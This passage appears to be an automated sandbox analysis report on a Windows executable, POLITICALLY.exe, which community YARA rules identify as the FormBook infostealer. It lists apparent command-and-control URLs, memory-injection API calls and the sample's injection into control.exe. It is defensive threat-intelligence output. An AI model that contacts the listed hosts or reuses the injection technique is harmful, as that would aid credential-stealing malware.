Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.purplebean.company/olg8/www.nortier.cloud
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.purplebean.companyReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.soakstress.xyz
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.soakstress.xyz/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.soakstress.xyz/olg8/www.moopyo.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.soakstress.xyzReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.tuancai.net
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.tuancai.net/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.tuancai.net/olg8/www.auroraleathers.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.tuancai.netReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.wiseowldigital.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.wiseowldigital.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.wiseowldigital.com/olg8/www.cunerier.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.wiseowldigital.comReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: C:\Users\user\Desktop\POLITICALLY.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222E459 NtProtectVirtualMemory,	2_2_0222E459
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222EB73 NtMapViewOfSection,	2_2_0222EB73
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221AE71 NtWriteVirtualMemory,	2_2_0221AE71
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221DC36 NtAllocateVirtualMemory,	2_2_0221DC36
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222F270 NtMapViewOfSection,	2_2_0222F270
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221E245 NtAllocateVirtualMemory,	2_2_0221E245
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221B24A NtWriteVirtualMemory,	2_2_0221B24A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221E378 NtAllocateVirtualMemory,	2_2_0221E378
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221B3D0 NtWriteVirtualMemory,	2_2_0221B3D0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222F3D4 NtMapViewOfSection,	2_2_0222F3D4
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221B121 NtWriteVirtualMemory,	2_2_0221B121
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222F658 NtMapViewOfSection,	2_2_0222F658
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221B698 NtWriteVirtualMemory,	2_2_0221B698
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222F768 NtMapViewOfSection,	2_2_0222F768
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221B7FC NtWriteVirtualMemory,	2_2_0221B7FC
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221B514 NtWriteVirtualMemory,	2_2_0221B514
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222F519 NtMapViewOfSection,	2_2_0222F519
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221BA7C NtWriteVirtualMemory,	2_2_0221BA7C
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221DB19 NtAllocateVirtualMemory,	2_2_0221DB19
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_02212B60 NtWriteVirtualMemory,	2_2_02212B60
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221BBB2 NtWriteVirtualMemory,	2_2_0221BBB2
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222EB8C NtMapViewOfSection,	2_2_0222EB8C
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222F896 NtMapViewOfSection,	2_2_0222F896
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221B932 NtWriteVirtualMemory,	2_2_0221B932
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221BE0D NtWriteVirtualMemory,	2_2_0221BE0D
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221AE76 NtWriteVirtualMemory,	2_2_0221AE76
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221CEAB NtWriteVirtualMemory,	2_2_0221CEAB
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222EF21 NtMapViewOfSection,	2_2_0222EF21
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221BF4D NtWriteVirtualMemory,	2_2_0221BF4D
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221AFD8 NtWriteVirtualMemory,	2_2_0221AFD8
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221DFD8 NtAllocateVirtualMemory,	2_2_0221DFD8
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221BCDC NtWriteVirtualMemory,	2_2_0221BCDC
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0222EDB9 NtMapViewOfSection,	2_2_0222EDB9
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_0221DD81 NtAllocateVirtualMemory,	2_2_0221DD81
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279660 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_1E279660
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2796E0 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_1E2796E0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279710 NtQueryInformationToken,LdrInitializeThunk,	10_2_1E279710
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2797A0 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_1E2797A0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279780 NtMapViewOfSection,LdrInitializeThunk,	10_2_1E279780
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279FE0 NtCreateMutant,LdrInitializeThunk,	10_2_1E279FE0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279540 NtReadFile,LdrInitializeThunk,	10_2_1E279540
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2795D0 NtClose,LdrInitializeThunk,	10_2_1E2795D0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279A20 NtResumeThread,LdrInitializeThunk,	10_2_1E279A20
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279A00 NtProtectVirtualMemory,LdrInitializeThunk,	10_2_1E279A00
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279A50 NtCreateFile,LdrInitializeThunk,	10_2_1E279A50
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279860 NtQuerySystemInformation,LdrInitializeThunk,	10_2_1E279860
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279840 NtDelayExecution,LdrInitializeThunk,	10_2_1E279840
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2798F0 NtReadVirtualMemory,LdrInitializeThunk,	10_2_1E2798F0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279910 NtAdjustPrivilegesToken,LdrInitializeThunk,	10_2_1E279910
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2799A0 NtCreateSection,LdrInitializeThunk,	10_2_1E2799A0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279610 NtEnumerateValueKey,	10_2_1E279610
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279670 NtQueryInformationProcess,	10_2_1E279670
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279650 NtQueryValueKey,	10_2_1E279650
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2796D0 NtCreateKey,	10_2_1E2796D0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279730 NtQueryVirtualMemory,	10_2_1E279730
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E27A710 NtOpenProcessToken,	10_2_1E27A710
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279760 NtOpenProcess,	10_2_1E279760
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E27A770 NtOpenThread,	10_2_1E27A770
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279770 NtSetInformationFile,	10_2_1E279770
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279520 NtWaitForSingleObject,	10_2_1E279520
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E27AD30 NtSetContextThread,	10_2_1E27AD30
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279560 NtWriteFile,	10_2_1E279560
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2795F0 NtQueryInformationFile,	10_2_1E2795F0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279A10 NtQuerySection,	10_2_1E279A10
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279A80 NtOpenDirectoryObject,	10_2_1E279A80
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279B00 NtSetValueKey,	10_2_1E279B00
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E27A3B0 NtGetContextThread,	10_2_1E27A3B0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279820 NtEnumerateKey,	10_2_1E279820
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E27B040 NtSuspendThread,	10_2_1E27B040
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2798A0 NtWriteVirtualMemory,	10_2_1E2798A0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E279950 NtQueueApcThread,	10_2_1E279950
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2799D0 NtCreateProcessEx,	10_2_1E2799D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048695D0 NtClose,LdrInitializeThunk,	23_2_048695D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869540 NtReadFile,LdrInitializeThunk,	23_2_04869540
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048696D0 NtCreateKey,LdrInitializeThunk,	23_2_048696D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048696E0 NtFreeVirtualMemory,LdrInitializeThunk,	23_2_048696E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869650 NtQueryValueKey,LdrInitializeThunk,	23_2_04869650
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869660 NtAllocateVirtualMemory,LdrInitializeThunk,	23_2_04869660
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869780 NtMapViewOfSection,LdrInitializeThunk,	23_2_04869780
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869FE0 NtCreateMutant,LdrInitializeThunk,	23_2_04869FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869710 NtQueryInformationToken,LdrInitializeThunk,	23_2_04869710
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869840 NtDelayExecution,LdrInitializeThunk,	23_2_04869840
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869860 NtQuerySystemInformation,LdrInitializeThunk,	23_2_04869860
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048699A0 NtCreateSection,LdrInitializeThunk,	23_2_048699A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869910 NtAdjustPrivilegesToken,LdrInitializeThunk,	23_2_04869910
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869A50 NtCreateFile,LdrInitializeThunk,	23_2_04869A50
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048695F0 NtQueryInformationFile,	23_2_048695F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869520 NtWaitForSingleObject,	23_2_04869520
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0486AD30 NtSetContextThread,	23_2_0486AD30
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869560 NtWriteFile,	23_2_04869560
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869610 NtEnumerateValueKey,	23_2_04869610
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869670 NtQueryInformationProcess,	23_2_04869670
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048697A0 NtUnmapViewOfSection,	23_2_048697A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0486A710 NtOpenProcessToken,	23_2_0486A710
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869730 NtQueryVirtualMemory,	23_2_04869730
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869760 NtOpenProcess,	23_2_04869760
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0486A770 NtOpenThread,	23_2_0486A770
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869770 NtSetInformationFile,	23_2_04869770
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048698A0 NtWriteVirtualMemory,	23_2_048698A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048698F0 NtReadVirtualMemory,	23_2_048698F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869820 NtEnumerateKey,	23_2_04869820
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0486B040 NtSuspendThread,	23_2_0486B040
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048699D0 NtCreateProcessEx,	23_2_048699D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869950 NtQueueApcThread,	23_2_04869950
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869A80 NtOpenDirectoryObject,	23_2_04869A80
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869A00 NtProtectVirtualMemory,	23_2_04869A00
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869A10 NtQuerySection,	23_2_04869A10
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869A20 NtResumeThread,	23_2_04869A20
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0486A3B0 NtGetContextThread,	23_2_0486A3B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04869B00 NtSetValueKey,	23_2_04869B00
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030B83A0 NtAllocateVirtualMemory,	23_2_030B83A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030B8270 NtReadFile,	23_2_030B8270
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030B82F0 NtClose,	23_2_030B82F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030B81C0 NtCreateFile,	23_2_030B81C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030B839A NtAllocateVirtualMemory,	23_2_030B839A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030B826A NtReadFile,	23_2_030B826A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030B82EA NtClose,	23_2_030B82EA
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030B81BA NtCreateFile,	23_2_030B81BA

Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 2_2_00404CFF	2_2_00404CFF
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E256E30	10_2_1E256E30
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2FD616	10_2_1E2FD616
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E302EF7	10_2_1E302EF7
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E301FF1	10_2_1E301FF1
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E30DFCE	10_2_1E30DFCE
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E24841F	10_2_1E24841F
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2FD466	10_2_1E2FD466
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E230D20	10_2_1E230D20
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E302D07	10_2_1E302D07
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E301D55	10_2_1E301D55
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E262581	10_2_1E262581
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E24D5E0	10_2_1E24D5E0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E3025DD	10_2_1E3025DD
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E3022AE	10_2_1E3022AE
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E302B28	10_2_1E302B28
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26EBB0	10_2_1E26EBB0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F03DA	10_2_1E2F03DA
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2FDBD2	10_2_1E2FDBD2
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E30E824	10_2_1E30E824
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F1002	10_2_1E2F1002
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2620A0	10_2_1E2620A0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E3020A8	10_2_1E3020A8
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E24B090	10_2_1E24B090
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E3028EC	10_2_1E3028EC
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E254120	10_2_1E254120
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23F900	10_2_1E23F900
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0483841F	23_2_0483841F
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048ED466	23_2_048ED466
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04852581	23_2_04852581
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F25DD	23_2_048F25DD
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0483D5E0	23_2_0483D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F2D07	23_2_048F2D07
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04820D20	23_2_04820D20
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F1D55	23_2_048F1D55
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F2EF7	23_2_048F2EF7
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048ED616	23_2_048ED616
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04846E30	23_2_04846E30
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048FDFCE	23_2_048FDFCE
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F1FF1	23_2_048F1FF1
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0483B090	23_2_0483B090
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048520A0	23_2_048520A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F20A8	23_2_048F20A8
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F28EC	23_2_048F28EC
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E1002	23_2_048E1002
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048FE824	23_2_048FE824
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0482F900	23_2_0482F900
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_04844120	23_2_04844120
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F22AE	23_2_048F22AE
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_0485EBB0	23_2_0485EBB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048E03DA	23_2_048E03DA
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048EDBD2	23_2_048EDBD2
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_048F2B28	23_2_048F2B28
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030BCB24	23_2_030BCB24
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030A2FB0	23_2_030A2FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030BC6F5	23_2_030BC6F5
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030BC50F	23_2_030BC50F
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030A2D8A	23_2_030A2D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030A2D90	23_2_030A2D90
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030A8C5E	23_2_030A8C5E
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030A8C60	23_2_030A8C60
Source: C:\Windows\SysWOW64\control.exe	Code function: 23_2_030BB4A6	23_2_030BB4A6

Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: String function: 1E23B150 appears 45 times
Source: C:\Windows\SysWOW64\control.exe	Code function: String function: 0482B150 appears 35 times

Source: POLITICALLY.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: POLITICALLY.exe, 00000002.00000002.415420522.0000000002200000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs POLITICALLY.exe
Source: POLITICALLY.exe, 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs POLITICALLY.exe
Source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCONTROL.EXEj% vs POLITICALLY.exe
Source: POLITICALLY.exe, 0000000A.00000002.548056458.0000000002420000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs POLITICALLY.exe

Source: POLITICALLY.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
